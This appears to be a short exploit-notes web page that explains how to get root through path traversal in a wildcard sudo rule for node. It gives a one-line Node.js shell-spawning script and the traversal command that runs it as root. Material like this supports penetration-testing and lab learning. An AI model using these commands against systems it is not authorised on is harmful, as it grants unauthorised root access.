Exploit Notes

Sudo Path Traversal Privilege Escalation

Last modified: 2023-02-05

Privilege Escalation

If some sudo command receives a file path, we might escalate to privileges using path traversal.

Investigation

sudo -l

(ALL) /usr/bin/node /usr/local/scripts/*.js

If the file path uses wildcards, we may execute arbitrary files.
In short, we can refer to files in different directories which the system owner unintended.


Exploitation

Assume we can execute ‘node’ command as root and js file.
Create the “test.js” under /tmp, which spawns a root shell after executing ‘node’ command.

// /tmp/test.js
require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})

Now run ‘node’ command as root. We can pass the file using path traversal.

sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.